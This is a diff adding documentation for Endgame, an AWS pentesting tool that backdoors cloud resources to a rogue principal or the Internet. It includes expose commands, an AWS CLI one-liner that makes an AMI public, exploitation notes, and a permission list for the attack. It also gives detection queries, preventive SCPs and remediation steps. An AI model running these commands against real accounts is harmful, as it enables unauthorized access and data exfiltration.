* AWS CLI should be set up locally
* Terraform should be installed
### Installing Terraform
* Install `tfenv` (Terraform version manager) via Homebrew, and install Terraform 0.12.28
```bash
brew install tfenv
tfenv install 0.12.28
tfenv use 0.12.28
```
### Build the demo infrastructure
* Run the Terraform code to generate the example AWS resources.
```bash
make terraform-demo
```
* Don't forget to clean up after.
```bash
make terraform-destroy
```

View File

View File

@ -0,0 +1,45 @@
# Testing
## Unit tests
* Run [pytest](https://docs.pytest.org/en/stable/) with the following:
```bash
make test
```
## Security tests
* Run [bandit](https://bandit.readthedocs.io/en/latest/) with the following:
```bash
make security-test
```
## Integration tests
After making any modifications to the program, you can run a full-fledged integration test, using this program against your own test infrastructure in AWS.
* First, set your environment variables
```bash
# Set the environment variable for the username that you will create a backdoor for.
export EVIL_PRINCIPAL="arn:aws:iam::999988887777:user/evil"
export AWS_REGION="us-east-1"
export AWS_PROFILE="default"
```
* Then run the full-fledged integration test:
```bash
make integration-test
```
This does the following:
* Sets up your local dev environment (see `setup-dev`) in the `Makefile`
* Creates the Terraform infrastructure (see `terraform-demo` in the `Makefile`)
* Runs `list-resources`, `exploit --dry-run`, and `expose` against this live infrastructure
* Destroys the Terraform infrastructure (see `terraform-destroy` in the `Makefile`)
Note that the `expose` command will not expose the resources to the world - it will only expose them to your rogue user, not to the world.

43
docs/custom.css Normal file
View File

@ -0,0 +1,43 @@
div.doc-contents:not(.first) {
padding-left: 25px;
border-left: 4px solid rgba(230, 230, 230);
margin-bottom: 80px;
}
div.doc-contents:not(.first) {
padding-left: 25px;
border-left: 4px solid rgba(230, 230, 230);
margin-bottom: 80px;
}
div.doc-module {
font-size: 1em;
}
h5.doc-heading {
text-transform: none !important;
}
h6.hidden-toc {
margin: 0 !important;
position: relative;
top: -70px;
}
h6.hidden-toc::before {
margin-top: 0 !important;
padding-top: 0 !important;
}
h6.hidden-toc a.headerlink {
display: none;
}
td code {
word-break: normal !important;
}
td p {
margin-top: 0 !important;
margin-bottom: 0 !important;
}

49
docs/detection.md Normal file
View File

@ -0,0 +1,49 @@
# Detection
There are three general methods that blue teams can use to **detect** AWS Resource Exposure Attacks:
1. User Agent Detection (Endgame specific)
2. API call detection
3. Behavioral-based detection
4. AWS Access Analyzer
While (1) User Agent Detection is specific to the usage of Endgame, (2) API Call Detection, (3) Behavioral-based detection, and (4) AWS Access Analyzer are strategies to detect Resource Exposure Attacks, regardless of if the attacker is using Endgame to do it.
## Detecting Resource Exposure Attacks
### API Call Detection
Further documentation on how to query for specific API calls made to each service by endgame is available in the [risks documentation](./risks).
### Behavioral-based detection
Behavioral-based detection is currently being researched and developed by [Ryan Stalets](https://twitter.com/RyanStalets). [GitHub issue #46](https://github.com/salesforce/endgame/issues/46) is being used to track this work. We welcome all contributions and discussion!
## Detecting Endgame
### User Agent Detection
Endgame uses the user agent `HotDogsAreSandwiches` by default. While this can be overriden using the `--cloak` flag, defense teams can still use it as an IOC.
The following CloudWatch Insights query will expose events with the `HotDogsAreSandwiches` user agent in CloudTrail logs:
```
fields eventTime, eventSource, eventName, userIdentity.arn, userAgent
| filter userAgent='HotDogsAreSandwiches'
```
This query assumes that your CloudTrail logs are being sent to CloudWatch and that you have selected the correct log group.
Further documentation on how to query for specific API calls made to each service by endgame is available in the [risks documentation](risks).
### AWS Access Analyzer
[AWS Access Analyzer](https://docs.aws.amazon.com/IAM/latest/UserGuide/what-is-access-analyzer.html) analyzes new or updated resource-based policies within 30 minutes of policy updates (triggered by CloudTrail log entries), and during periodic scans (every 24 hours). If an attacker leverages the `expose` or `smash` commands but quickly rolls back the changes with `--undo`, you might not find out about the attack with Access Analyzer until 30 minutes later.
However, Access Analyzer can still be especially useful in ensuring that if attacks do gain a foothold in your infrastructure. If the attacker ran Endgame or perform resource exposure attacks without the tool, you can still use Access Analyzer to alert on those changes so you can respond to the issue, instead of allowing a persistent backdoor.
Consider leveraging `aws:PrincipalOrgID` or `aws:PrincipalOrgPaths` in your Access Analyzer filter keys to detect access from IAM principals outside your AWS account. See [Access Analyzer Filter Keys](https://docs.aws.amazon.com/IAM/latest/UserGuide/access-analyzer-reference-filter-keys.html) for more details.
## Further Reading
Additional information on AWS resource policies, how this tool works in the victim account, and identification/containment suggestions is [here](resource-policy-primer.md).

90
docs/iam-permissions.md Normal file
View File

@ -0,0 +1,90 @@
# IAM Permissions
The IAM Permissions listed below are used to create these backdoors.
You don't need **all** of these permissions to run the tool. You just need enough from each service. For example, `s3:ListAllMyBuckets`, `s3:GetBucketPolicy`, and `s3:PutBucketPolicy` are all the permissions needed to leverage this tool to expose S3 buckets.
```json
{
"Version": "2012-10-17",
"Statement": [
{
"Sid": "IAmInevitable",
"Effect": "Allow",
"Action": [
"acm-pca:DeletePolicy",
"acm-pca:GetPolicy",
"acm-pca:ListCertificateAuthorities",
"acm-pca:PutPolicy",
"ec2:DescribeImageAttribute",
"ec2:DescribeImages",
"ec2:DescribeSnapshotAttribute",
"ec2:DescribeSnapshots",
"ec2:ModifySnapshotAttribute",
"ec2:ModifyImageAttribute",
"ecr:DescribeRepositories",
"ecr:DeleteRepositoryPolicy",
"ecr:GetRepositoryPolicy",
"ecr:SetRepositoryPolicy",
"elasticfilesystem:DescribeFileSystems",
"elasticfilesystem:DescribeFileSystemPolicy",
"elasticfilesystem:PutFileSystemPolicy",
"es:DescribeElasticsearchDomainConfig",
"es:ListDomainNames",
"es:UpdateElasticsearchDomainConfig",
"glacier:GetVaultAccessPolicy",
"glacier:ListVaults",
"glacier:SetVaultAccessPolicy",
"iam:GetRole",
"iam:ListRoles",
"iam:UpdateAssumeRolePolicy",
"kms:GetKeyPolicy",
"kms:ListKeys",
"kms:ListAliases",
"kms:PutKeyPolicy",
"lambda:AddLayerVersionPermission",
"lambda:AddPermission",
"lambda:GetPolicy",
"lambda:GetLayerVersionPolicy",
"lambda:ListFunctions",
"lambda:ListLayers",
"lambda:ListLayerVersions",
"lambda:RemoveLayerVersionPermission",
"lambda:RemovePermission",
"logs:DescribeResourcePolicies",
"logs:DeleteResourcePolicy",
"logs:PutResourcePolicy",
"rds:DescribeDbClusterSnapshots",
"rds:DescribeDbClusterSnapshotAttributes",
"rds:DescribeDbSnapshots",
"rds:DescribeDbSnapshotAttributes",
"rds:ModifyDbSnapshotAttribute",
"rds:ModifyDbClusterSnapshotAttribute",
"s3:GetBucketPolicy",
"s3:ListAllMyBuckets",
"s3:PutBucketPolicy",
"secretsmanager:GetResourcePolicy",
"secretsmanager:DeleteResourcePolicy",
"secretsmanager:ListSecrets",
"secretsmanager:PutResourcePolicy",
"ses:DeleteIdentityPolicy",
"ses:GetIdentityPolicies",
"ses:ListIdentities",
"ses:ListIdentityPolicies",
"ses:PutIdentityPolicy",
"sns:AddPermission",
"sns:ListTopics",
"sns:GetTopicAttributes",
"sns:RemovePermission",
"sqs:AddPermission",
"sqs:GetQueueUrl",
"sqs:GetQueueAttributes",
"sqs:ListQueues",
"sqs:RemovePermission"
],
"Resource": "*"
}
]
}
```

Binary file not shown.

After

Width:  |  Height:  |  Size: 67 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 98 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 98 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 104 KiB

BIN
docs/images/endgame.gif Normal file

Binary file not shown.

After

Width:  |  Height:  |  Size: 1.2 MiB

69
docs/index.md Normal file
View File

@ -0,0 +1,69 @@
# Endgame: Creating Backdoors in AWS
An AWS Pentesting tool that lets you use one-liner commands to backdoor an AWS account's resources with a rogue AWS account - or share the resources with the entire Internet 😈
<p align="center">
<img src="images/endgame.gif">
</p>
Endgame abuses AWS's resource permission model to grant rogue users (or the Internet) access to an AWS account's resources with a single command. It does this through one of three methods:
1. Modifying [resource-based policies](https://endgame.readthedocs.io/en/latest/resource-policy-primer/) (such as [S3 Bucket policies](https://docs.aws.amazon.com/AmazonS3/latest/userguide/WebsiteAccessPermissionsReqd.html#bucket-policy-static-site) or [Lambda Function policies](https://docs.aws.amazon.com/lambda/latest/dg/access-control-resource-based.html#permissions-resource-xaccountinvoke))
2. Resources that can be made public through sharing APIs (such as [Amazon Machine Images (AMIs)](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/sharingamis-explicit.html), [EBS disk snapshots](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ebs-modifying-snapshot-permissions.html), and [RDS database snapshots](https://docs.aws.amazon.com/AmazonRDS/latest/UserGuide/USER_ShareSnapshot.html))
3. Sharing resources via [AWS Resource Access Manager (RAM)](https://docs.aws.amazon.com/ram/latest/userguide/shareable.html)
Endgame was created to:
* Push [AWS](https://endgame.readthedocs.io/en/latest/recommendations-to-aws/) to improve coverage of AWS Access Analyzer so AWS users can protect themselves.
* Show [blue teams](https://endgame.readthedocs.io/en/latest/recommendations-to-blue-teams/) and developers what kind of damage can be done by overprivileged/leaked accounts.
* Help red teams to demonstrate impact of their access.
Endgame demonstrates (with a bit of shock and awe) how simple human errors in excessive permissions (such a granting `s3:*` access instead of `s3:GetObject`) can be abused by attackers. These are not new attacks, but AWS's ability to **detect** _and_ **prevent** these attacks falls short of what customers need to protect themselves. This is what inspired us to write this tool. Follow the [Tutorial](./tutorial.md) and observe how you can expose resources across **17 different AWS services** to the Internet in a matter of seconds.
The resource types that can be exposed are of high value to attackers. This can include:
* Privileged compute access (by exposing who can invoke `lambda` functions)
* Database snapshots (`rds`), Storage buckets (`s3`), file systems (`elasticfilesystem`), storage backups (`glacier`), disk snapshots (`ebs` snapshots),
* Encryption keys (`kms`), secrets (`secretsmanager`), and private certificate authorities (`acm-pca`)
* Messaging and notification services (`sqs` queues, `sns` topics, `ses` authorized senders)
* Compute artifacts (`ec2` AMIs, `ecr` images, `lambda` layers)
* Logging endpoints (`cloudwatch` resource policies)
* Search and analytics engines (`elasticsearch` clusters)
Endgame is an attack tool, but it was written with a specific purpose. We wrote this tool with desired outcomes for the following audiences:
1. **AWS**: We want AWS to empower their customers with the capabilities to fight these attacks. Our recommendations are outlined in the [Recommendations to AWS](./recommendations-to-aws.md) section.
2. **AWS Customers and their customers**: It is better to have risks be more easily understood and know how to mitigate those risks than to force people to fight something novel. By increasing awareness about Resource Exposure and excessive permissions, we can protect ourselves against attacks where the attackers previously held the advantage and AWS customers were previously left blind.
3. **Blue Teams**: Defense teams can leverage the guidance around user-agent detection, API call detection, and behavioral detection outlined in the [Recommendations to Blue Teams](prevention.md) section.
4. **Red Teams**: This will make for some very eventful red team exercises. Make sure you give the Blue Team kudos when they catch you!
## Supported Backdoors
Endgame can create backdoors for resources in any of the services listed in the table below.
Note: At the time of this writing, [AWS Access Analyzer](https://docs.aws.amazon.com/IAM/latest/UserGuide/access-analyzer-resources.html) does **NOT** support auditing **11 out of the 18 services** that Endgame attacks. Given that Access Analyzer is intended to detect this exact kind of violation, we kindly suggest to the AWS Team that they support all resources that can be attacked using Endgame. 😊
| Backdoor Resource Type | Endgame | [AWS Access Analyzer Support][1] |
|---------------------------------------------------------|---------|----------------------------------|
| [ACM Private CAs](risks/acm-pca.md) | ✅ | ❌ |
| [CloudWatch Resource Policies](risks/logs.md) | ✅ | ❌ |
| [EBS Volume Snapshots](risks/ebs.md) | ✅ | ❌ |
| [EC2 AMIs](risks/amis.md) | ✅ | ❌ |
| [ECR Container Repositories](risks/ecr.md) | ✅ | ❌ |
| [EFS File Systems](risks/efs.md) | ✅ | ❌ |
| [ElasticSearch Domains](risks/es.md) | ✅ | ❌ |
| [Glacier Vault Access Policies](risks/glacier.md) | ✅ | ❌ |
| [IAM Roles](risks/iam-roles.md) | ✅ | ✅ |
| [KMS Keys](risks/kms.md) | ✅ | ✅ |
| [Lambda Functions](risks/lambda-functions.md) | ✅ | ✅ |
| [Lambda Layers](risks/lambda-layers.md) | ✅ | ✅ |
| [RDS Snapshots](risks/rds-snapshots.md) | ✅ | ❌ |
| [S3 Buckets](risks/s3.md) | ✅ | ✅ |
| [Secrets Manager Secrets](risks/secretsmanager.md) | ✅ | ✅ |
| [SES Sender Authorization Policies](risks/ses.md) | ✅ | ❌ |
| [SQS Queues](risks/sqs.md) | ✅ | ✅ |
| [SNS Topics](risks/sns.md) | ✅ | ❌ |
[1]: https://docs.aws.amazon.com/IAM/latest/UserGuide/access-analyzer-resources.html

30
docs/installation.md Normal file
View File

@ -0,0 +1,30 @@
# Installation
* pip3
```bash
pip3 install --user endgame
```
* Homebrew (this will not work until the repository is public)
```bash
brew tap kmcquade/endgame https://github.com/kmcquade/endgame
brew install endgame
```
Now you should be able to execute `endgame` from command line by running `endgame --help`.
#### Shell Completion
* To enable Bash completion, put this in your `~/.bashrc`:
```bash
eval "$(_ENDGAME_COMPLETE=source endgame)"
```
* To enable ZSH completion, put this in your `~/.zshrc`:
```bash
eval "$(_ENDGAME_COMPLETE=source_zsh endgame)"
```

201
docs/prevention.md Normal file
View File

@ -0,0 +1,201 @@
# Prevention
There are 6 general methods that blue teams can use to **prevent** AWS Resource Exposure Attacks:
1. Use AWS KMS Customer-Managed Keys to encrypt resources
2. Leverage Strong Resource-based Policies
3. Trusted Accounts Only
4. Inventory which IAM Principals are capable of Resource Exposure
5. AWS Service Control Policies
6. Prevent AWS RAM External Principals
## Use AWS KMS Customer-Managed Keys
If an attacker does not have access to your Customer Managed Key, the attacker cannot access the resource. You can leverage this strategy to prevent cases in which your resources are leaked to the internet but the attacker did not have access to the encryption key.
Additionally, use strong resource-based policies on the Customer Managed Keys and leverage them to prevent other IAM Principals in the account from using that key for decrypt operations or management operations. If the attacker cannot use the key to decrypt, they effectively cannot access the resource.
## Leverage strong resource-based policies
Strong resource-based policies can ensure that only the intended IAM principals can modify the KMS key policy (i.e, using `kms:PutKeyPolicy` permissions. Under this scenario, even if an attacker has privileged access, if they are not granted `kms:PutKeyPolicy` by the KMS key, then they can't subvert your KMS encryption.
## Trusted Accounts Only
Practice good security hygiene throughout your SDLC. Ensure that only trusted accounts are allowed any level of access to your accounts, especially via resource-based policies.
## Inventory which IAM Principals are Capable of Resource Exposure
Consider using [Cloudsplaining](https://github.com/salesforce/cloudsplaining/#cloudsplaining) to identify violations of least privilege in IAM policies. This can help limit the IAM principals that have access to the actions that could perform Resource Exposure activities. See the example report [here](https://opensource.salesforce.com/cloudsplaining/)
## AWS Service Control Policies (SCPs)
AWS Service Control Policies (SCPs) cannot be used to strictly prevent resources from becoming public.
However, there are well-known AWS Service Control Policies that can force encryption on EBS and RDS snapshots, which essentially also blocks public access as mentioned above.
### Enforce RDS Encryption
As covered in [this blog post](https://medium.com/@cbchhaya/aws-scp-to-mandate-rds-encryption-6b4dc8b036a), the following AWS SCP can be used to Mandate RDS Encryption:
```json
{
"Version": "2012-10-17",
"Statement": [
{
"Sid": "StatementForOtherRDS",
"Effect": "Deny",
"Action": [
"rds:CreateDBInstance"
],
"Resource": [
"*"
],
"Condition": {
"ForAnyValue:StringEquals": {
"rds:DatabaseEngine": [
"mariadb",
"mysql",
"oracle-ee",
"oracle-se2",
"oracle-se1",
"oracle-se",
"postgres",
"sqlserver-ee",
"sqlserver-se",
"sqlserver-ex",
"sqlserver-web"
]
},
"Bool": {
"rds:StorageEncrypted": "false"
}
}
},
{
"Sid": "StatementForAurora",
"Effect": "Deny",
"Action": [
"rds:CreateDBCluster"
],
"Resource": [
"*"
],
"Condition": {
"Bool": {
"rds:StorageEncrypted": "false"
}
}
}
]
}
```
### Require Encryption on All S3 Buckets
The following SCP requires that all Amazon S3 buckets use AES256 encryption in an AWS Account.
```json
{
"Version": "2012-10-17",
"Statement": [
{
"Action": [
"s3:PutObject"
],
"Resource": "*",
"Effect": "Deny",
"Condition": {
"StringNotEquals": {
"s3:x-amz-server-side-encryption": "AES256"
}
}
},
{
"Action": [
"s3:PutObject"
],
"Resource": "*",
"Effect": "Deny",
"Condition": {
"Bool": {
"s3:x-amz-server-side-encryption": false
}
}
}
]
}
```
### Protect S3 Block Public Access
After setting up your AWS account, set the [S3 Block Public Access](https://docs.aws.amazon.com/AmazonS3/latest/userguide/access-control-block-public-access.html) to enforce at the AWS Account level (not just the bucket level). Then, apply this SCP to prevent users or roles in any affected account from modifying the S3 Block Public Access Settings in an Account.
Note: This will only eliminate the risk of modifying an S3 bucket policy to allow `*` Principals. It will not eliminate the risk of modifying an S3 bucket policy to allow rogue IAM users or rogue accounts.
```json
{
"Version": "2012-10-17",
"Statement": [
{
"Action": [
"s3:PutBucketPublicAccessBlock"
],
"Resource": "*",
"Effect": "Deny"
}
]
}
```
### Protect AWS Access Analyzer
While AWS Access Analyzer has its shortcomings, it is a uniquely useful tool that you should use to help address the risk of Resource Exposure Attacks.
When using AWS Access Analyzer, it is paramount that AWS Access Analyzer configuration is protected against malicious modification by users who seek to disable security alerts before performing malicious activities.
The following SCP prevents users or roles in any affected account from deleting AWS Access Analyzer in an AWS account:
```
{
"Version": "2012-10-17",
"Statement": [
{
"Action": [
"access-analyzer:DeleteAnalyzer"
],
"Resource": "*",
"Effect": "Deny"
}
]
}
```
### Prevent AWS RAM External Principals
This SCP prevents users or roles in any affected account from creating Resource Access Shares using RAM that are shared with external principals outside the organization. This can categorically eliminate one of the three methods of Resource Exposure identified by Endgame and is highly suggested.
```json
{
"Version": "2012-10-17",
"Statement": [
{
"Action": [
"*"
],
"Resource": "*",
"Effect": "Deny",
"Condition": {
"Bool": {
"ram:AllowsExternalPrincipals": "true"
}
}
}
]
}
```
## Further Reading
* [Blog Post about Using AWS SCPs to Mandate RDS Encryption](https://medium.com/@cbchhaya/aws-scp-to-mandate-rds-encryption-6b4dc8b036a)

View File

@ -0,0 +1,18 @@
# Recommendations to AWS
While [Cloudsplaining](https://opensource.salesforce.com/cloudsplaining/) (a Salesforce-produced AWS IAM assessment tool), showed us the pervasiveness of least privilege violations in AWS IAM across the industry, Endgame shows us how it is already easy for attackers. These are not new attacks, but AWS's ability to **detect** _and_ **prevent** these attacks falls short of what customers need to protect themselves.
[AWS Access Analyzer](https://docs.aws.amazon.com/IAM/latest/UserGuide/what-is-access-analyzer.html) is a tool produced by AWS that helps you identify the resources in your organization and accounts, such as Amazon S3 buckets or IAM roles, that are shared with an external entity. In short, it **detects** instances of this resource exposure problem. However, it does not by itself meet customer need, due to current gaps in coverage and the lack of preventative tooling to compliment it.
At the time of this writing, [AWS Access Analyzer](https://docs.aws.amazon.com/IAM/latest/UserGuide/access-analyzer-resources.html) does **NOT** support auditing **11 out of the 18 services** that Endgame attacks. Given that Access Analyzer is intended to detect this exact kind of violation, we kindly suggest to the AWS Team that they support all resources that can be attacked using Endgame. 😊
The lack of preventative tooling makes this issue more difficult for customers. Ideally, customers should be able to say, _"Nobody in my AWS Organization is allowed to share **any** resources that can be exposed by Endgame outside of the organization, unless that resource is in an exemption list."_ This **should** be possible, but it is not. It is not even possible to use [AWS Service Control Policies (SCPS)](https://docs.aws.amazon.com/organizations/latest/userguide/orgs_manage_policies_scps.html) - AWS's preventative guardrails service - to prevent `sts:AssumeRole` calls from outside your AWS Organization. The current SCP service limit of 5 SCPs per AWS account compounds this problem.
We recommend that AWS take the following measures in response:
* Increase Access Analyzer Support to cover the resources that can be exposed via Resource-based Policy modification, AWS RAM resource sharing, and resource-specific sharing APIs (such as RDS snapshots, EBS snapshots, and EC2 AMIs)
* Create GuardDuty rules that detect anomalous exposure of resources outside your AWS Organization.
* Expand the current limit of 5 SCPs per AWS account to 200. (for comparison, the Azure equivalent - Azure Policies - has a limit of [200 Policy or Initiative Assignments per subscription](https://docs.microsoft.com/en-us/azure/azure-resource-manager/management/azure-subscription-service-limits#azure-policy-limits))
* Improve the AWS SCP service to support an "Audit" mode that would record in CloudTrail whether API calls would have been denied had the SCP not been in audit mode. This would increase customer adoption and make it easier for customers to both pilot and roll out new guardrails. (for comparison, the Azure Equivalent - Azure Policies - already [supports Audit mode](https://docs.microsoft.com/en-us/azure/governance/policy/concepts/effects#audit).
* Support the usage of `sts:AssumeRole` to prevent calls from outside your AWS Organization, with targeted exceptions.
* Add IAM Condition Keys to all the IAM Actions that are used to perform Resource Exposure. These IAM Condition Keys should be used to prevent these resources from (1) being shared with the public **and** (2) being shared outside of your `aws:PrincipalOrgPath`.

View File

@ -0,0 +1,10 @@
mkdocs==1.1.2
mkdocs-material==6.2.8
mkdocs-material-extensions==1.0.1
mkdocstrings==0.14.0
atomicwrites==1.4.0
distlib==0.3.1
filelock==3.0.12
Pygments==2.8.0
pymdown-extensions==8.1.1
pytkdocs==0.10.1

View File

@ -0,0 +1,32 @@
# AWS Resource Policies, Endgame, and You
## Background
AWS resource policies enable developers to grant permissions to specified principals (or the internet) using policy documents that apply only to a specific resource (ex: buckets, KMS keys, etc). This enables very granular access to resources to be achieved. For example, you can grant an IAM user in another account very specific permissions to a single S3 bucket without requiring them to assume a role in your account.
## Identity Policies vs. Resource Policies
The key thing to remember with resource-based policies is that they are attached _directly to an AWS resource_, like an S3 bucket, and are considered as one component in the policy evaluation that occurs when an API call is made. They are managed _by the service itself_, not IAM. Identity-based policies are attached to _an IAM principal_ such as an IAM user or role. These policies define what a principal can do across all services and resources; however, they do not always limit what permissions can be granted to the principal by a resource-based policy.
## Policy Evaluation Process
In the context of Endgame, the most important process to understand is the one documented [here](https://docs.aws.amazon.com/IAM/latest/UserGuide/reference_policies_evaluation-logic-cross-account.html). This process defines how resource policies and identity policies interact when _cross-account_ calls are made to a resource, which is the most likely scenario for an Endgame victim. To summarize the document, when the principal making the API call is in a different account than the resource the call targets, both the identity policy of the calling principal and the resource policy of the subject resource must permit the call (this is different than when the principal and resource are in the same account). Endgame exploits the fact that since the attacker controls their own account, access to a resource in a victim account can be granted using the resource policy alone.
## What This Means for Defenders
### How Endgame Works
The prerequisite for an attacker running Endgame is they have access to AWS API credentials for the victim account which have privileges to update resource policies.
Endgame can run in two modes, ```expose``` or ```smash```. The less-destructive ```expose``` mode is surgical, updating the resource policy on a single attacker-defined resource to include a back door to a principal they control (or the internet if they're mean).
```smash```, on the other hand, is more destructive (and louder). ```smash``` can run on a single service or all supported services. In either case, for each service it enumerates a list of resources in that region, reads the current resource policy on each, and applies a new policy which includes the "evil principal" the attacker has specified. The net effect of this is that depending on the privileges they have in the victim account, an attacker can insert dozens of back doors which are not controlled by the victim's IAM policies.
These back doors largely grant access to accomplish data exfiltration from buckets, snapshots, etc. However, other things could be possible depending on the victim account's architecture. For example, an attacker could use these back doors to:
* Escalate privileges by enabling the attacker's evil principal to assume roles in the victim account
* Manipulate CI/CD pipelines which rely on AWS S3 as an artifact source
* Modify Lambda functions to include back doors, skimmers, etc for Lambda-based serverless applications
* Invoke Lambda functions with unfiltered input, bypassing API Gateway for serverless API's
* Provide attacker-defined input to applications which leverage SQS or SNS for work control
* Pivot to other applications which have credentials stored in Secrets Manager
* And more!
### Incident Identification & Containment Steps
In incidents where resource policies may have been modified (can be determined using CloudTrail, see [risks](/docs/risks/)), each resource policy should be reviewed to identify potential back doors or unintended internet exposure. The attacker's interactions with these resources should also be reviewed where possible.
CloudTrail only logs data-level events (S3 object retrieval, Lambda function invocation, etc) for three services: S3, Lambda, and KMS. This visibility is also not enabled by default on trails. Other management-level events such as manipulation of Lambda function code will be visible in a standard management-event CloudTrail trail. Further documentation for working with CloudTrail can be found [here](https://docs.aws.amazon.com/awscloudtrail/latest/userguide/cloudtrail-getting-started.html).

79
docs/risks/acm-pca.md Normal file
View File

@ -0,0 +1,79 @@
# ACM Private Certificate Authority (PCA)
* [Steps to Reproduce](#steps-to-reproduce)
* [Exploitation](#exploitation)
* [Remediation](#remediation)
* [References](#references)
## Steps to Reproduce
* ‼️ If you are using the Terraform demo infrastructure, you must take some follow-up steps after provisioning the resources in order to be able to expose the demo resource. This is due to how ACM PCA works. For instructions, see the [Appendix on ACM PCA Activation](../appendices/acm-pca-activation.md)
* To expose the resource using `endgame`, run the following from the victim account:
```bash
export EVIL_PRINCIPAL=arn:aws:iam::999988887777:user/evil
export CERTIFICATE_ID=12345678-1234-1234-1234-123456789012
endgame expose --service acm-pca --name $CERTIFICATE_ID
```
* To view the contents of the ACM PCA resource policy, run the following:
```bash
export AWS_REGION=us-east-1
export VICTIM_ACCOUNT_ID=111122223333
export CERTIFICATE_ID=12345678-1234-1234-1234-123456789012
export CERTIFICATE_ARN = arn:aws:acm-pca:$AWS_REGION:$VICTIM_ACCOUNT_ID:certificate-authority/$CERTIFICATE_ID
aws acm-pca list-permissions --certificate-authority-arn $CERTIFICATE_ARN
```
* Observe that the contents of the overly permissive resource-based policy match the example shown below.
## Example
```bash
{
"Permissions": [
{
"Actions": {
"IssueCertificate",
"GetCertificate",
"ListPermissions"
},
"CertificateAuthorityArn": "arn:aws:acm:us-east-1:111122223333:certificate/12345678-1234-1234-1234-123456789012",
"CreatedAt": 1.516130652887E9,
"Principal": "acm.amazonaws.com",
"SourceAccount": "111122223333"
}
]
}
```
## Exploitation
```
TODO
```
## Remediation
> ‼️ **Note**: At the time of this writing, AWS Access Analyzer does **NOT** support auditing of this resource type to prevent resource exposure. **We kindly suggest to the AWS Team that they support all resources that can be attacked using this tool**. 😊
* **Trusted Accounts Only**: Ensure that AWS PCA Certificates are only shared with trusted accounts, and that the trusted accounts truly need access to the Certificates.
* **Ensure access is necessary**: For any trusted accounts that do have access, ensure that the access is absolutely necessary.
* **Restrict access to IAM permissions that could lead to exposing usage of your private CAs**: Tightly control access to the following IAM actions:
- [acm-pca:GetPolicy](https://docs.aws.amazon.com/acm-pca/latest/APIReference/API_GetPolicy.html): Retrieves the policy on an ACM Private CA._
- [acm-pca:PutPolicy](https://docs.aws.amazon.com/acm-pca/latest/APIReference/API_PutPolicy.html): _Puts a policy on an ACM Private CA._
- [acm-pca:DeletePolicy](https://docs.aws.amazon.com/acm-pca/latest/APIReference/API_DeletePolicy.html): _Deletes the policy for an ACM Private CA._
Also, consider using [Cloudsplaining](https://github.com/salesforce/cloudsplaining/#cloudsplaining) to identify violations of least privilege in IAM policies. This can help limit the IAM principals that have access to the actions that could perform Resource Exposure activities. See the example report [here](https://opensource.salesforce.com/cloudsplaining/)
## References
* [Attaching a Resource-based Policy for Cross Account Access in ACM PCA](https://docs.aws.amazon.com/acm-pca/latest/userguide/pca-rbp.html)
* [GetPolicy](https://docs.aws.amazon.com/acm-pca/latest/APIReference/API_GetPolicy.html)
* [PutPolicy](https://docs.aws.amazon.com/acm-pca/latest/APIReference/API_PutPolicy.html)
* [DeletePolicy](https://docs.aws.amazon.com/acm-pca/latest/APIReference/API_DeletePolicy.html)

85
docs/risks/amis.md Normal file
View File

@ -0,0 +1,85 @@
# EC2 AMIs (Machine Images)
* [Steps to Reproduce](#steps-to-reproduce)
* [Exploitation](#exploitation)
* [Remediation](#remediation)
* [Basic Detection](#basic-detection)
* [References](#references)
## Steps to Reproduce
* To expose the resource using `endgame`, run the following from the victim account:
```bash
export EVIL_PRINCIPAL=*
export IMAGE_ID=ami-5731123e
endgame expose --service ebs --name $SNAPSHOT_ID
```
* To expose the resource using AWS CLI, run the following from the victim account:
```bash
aws ec2 modify-image-attribute \
--image-id ami-5731123e \
--launch-permission "Add=[{Group=all}]"
```
* To validate that the resource has been shared publicly, run the following:
```bash
aws ec2 describe-image-attribute \
--image-id ami-5731123e \
--attribute launchPermission
```
* Observe that the contents of the exposed AMI match the example shown below.
## Example
The output of `aws ec2 describe-image-attribute` reveals that the AMI is public if the value of "Group" under "LaunchPermissions" is equal to "all"
```
{
"LaunchPermissions": [
{
"Group": "all"
}
],
"ImageId": "ami-5731123e",
}
```
## Exploitation
After an EC2 AMI is made public, an attacker can then:
* [Copy the AMI](https://docs.aws.amazon.com/cli/latest/reference/ec2/copy-image.html) into their own account
* Launch an EC2 instance using that AMI and browse the contents of the disk, potentially revealing sensitive or otherwise non-public information.
## Remediation
> ‼️ **Note**: At the time of this writing, AWS Access Analyzer does **NOT** support auditing of this resource type to prevent resource exposure. **We kindly suggest to the AWS Team that they support all resources that can be attacked using this tool**. 😊
* **Encrypt all AMIs with Customer-Managed Keys**: Follow the encryption-related recommendations in the [Prevention Guide](https://endgame.readthedocs.io/en/latest/prevention/#use-aws-kms-customer-managed-keys)
* **Trusted Accounts Only**: Ensure that EC2 AMIs are only shared with trusted accounts, and that the trusted accounts truly need access to the EC2 AMIs.
* **Ensure access is necessary**: For any trusted accounts that do have access, ensure that the access is absolutely necessary.
* **Restrict access to IAM permissions that could lead to exposure of your AMIs**: Tightly control access to the following IAM actions:
- [ec2:ModifyImageAttribute](https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_ModifyImageAttribute.html): _Grants permission to modify an attribute of an Amazon Machine Image (AMI)_
- [ec2:DescribeImageAttribute](https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_DescribeImageAttribute.html): _Grants permission to describe an attribute of an Amazon Machine Image (AMI). This includes information on which accounts have access to the AMI_
- [ec2:DescribeImages](https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_DescribeImages.html): _Grants permission to describe one or more images (AMIs, AKIs, and ARIs)_
Also, consider using [Cloudsplaining](https://github.com/salesforce/cloudsplaining/#cloudsplaining) to identify violations of least privilege in IAM policies. This can help limit the IAM principals that have access to the actions that could perform Resource Exposure activities. See the example report [here](https://opensource.salesforce.com/cloudsplaining/)
## Basic Detection
The following CloudWatch Log Insights query will include exposure actions taken by endgame:
```
fields eventTime, eventSource, eventName, userIdentity.arn, userAgent
| filter eventSource='ec2.amazonaws.com' and (eventName='ModifyImageAttribute' and requestParameters.attributeType='launchPermission')
```
This query assumes that your CloudTrail logs are being sent to CloudWatch and that you have selected the correct log group.
## References
- [aws ec2 modify-image-attribute](https://docs.aws.amazon.com/cli/latest/reference/ec2/modify-image-attribute.html)
